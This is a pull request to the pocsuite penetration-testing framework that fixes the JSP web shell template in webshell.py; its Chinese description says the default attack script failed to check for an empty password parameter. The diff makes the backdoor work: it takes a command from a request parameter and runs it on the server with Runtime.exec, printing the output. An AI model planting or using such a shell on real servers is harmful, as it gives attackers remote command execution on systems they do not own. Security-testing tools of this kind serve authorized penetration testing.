### PR TITLE
update JspShell backdoor to fix syntax error

### DIFF
--- a/pocsuite/lib/utils/webshell.py
+++ b/pocsuite/lib/utils/webshell.py
@@ -100,11 +100,12 @@ class JspShell(Webshell):
         '<%@ page import="java.io.*"%>\n' \
         '<%@ page import="java.util.*"%>\n' \
         '<%\n' \
-        'if (request.getParameter("check") == "1")\n' \
+        'String cmd = request.getParameter("{0}");\n' \
+        'if ("1".equals(request.getParameter("check")))\n' \
         '    out.println("202cTEST4b70".replace("TEST","' + _keyword + '"));\n' \
-        'if (request.getParameter("{0}") != null)\n' \
+        'if (cmd != null && !"".equals(cmd))\n' \
         '{{\n' \
-        '    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));\n' \
+        '    Process p = Runtime.getRuntime().exec(cmd);\n' \
         '    OutputStream os = p.getOutputStream();\n' \
         '    InputStream in = p.getInputStream();\n' \
         '    DataInputStream dis = new DataInputStream(in);\n' \


### PR DESCRIPTION
JspShell中默认的攻击脚本对密码参数处理存在问题，生成的Shell脚本未检查参数是否为空字符串的问题，在访问时会报错，导致验证失败。